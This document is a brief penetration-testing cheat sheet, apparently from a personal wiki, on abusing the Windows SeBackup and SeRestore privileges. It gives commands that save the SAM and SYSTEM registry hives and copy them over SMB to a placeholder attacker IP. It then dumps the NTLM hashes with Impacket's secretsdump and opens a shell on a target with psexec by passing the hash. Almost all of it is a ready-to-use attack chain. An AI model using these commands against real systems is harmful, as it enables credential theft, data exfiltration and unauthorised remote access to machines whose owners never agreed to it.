# Windows SeBackup and SeRestore permissions These permission allow full read (SeBackup) and write (SeRestore) access to any file. The first of these allows for exfiltration, while the second allows binaries to be replaced at will (combine with service- or task-based attacks!). The "Backup Operators" group has *both* of these permissions! Backup useful registry hives: ```powershell reg save HKLM\SYSTEM $PATH_TO_HIVE_FILE reg save HKLM\SAM $PATH_TO_HIVE_FILE ``` Run a local SMB server with [[Impacket]]: ```bash impacket-smbserver -smb2support -username $CONNECTION_USER \ -password $CONNECTION_PASSWORD $SHARE_NAME $PATH_TO_DIRECTORY ``` Then, just use copy on Windows: ```powershell copy $FILE \\$ATTACKER_IP\$SHARE_NAME\ ``` Use [[Impacket]] to dump hashes from a hive and perform a pass-the-hash attack: ```bash # Get hashes from SAM/SYSTEM hives # impacket-secretsdump -sam $SAM_HIVE_FILE \ -system $SYSTEM_HIVE_FILE LOCAL # Get a shell by passing a hash # impacket-psexec -hashes $FULL_NTLM_HASH $TARGET_USER@$TARGET_IP ```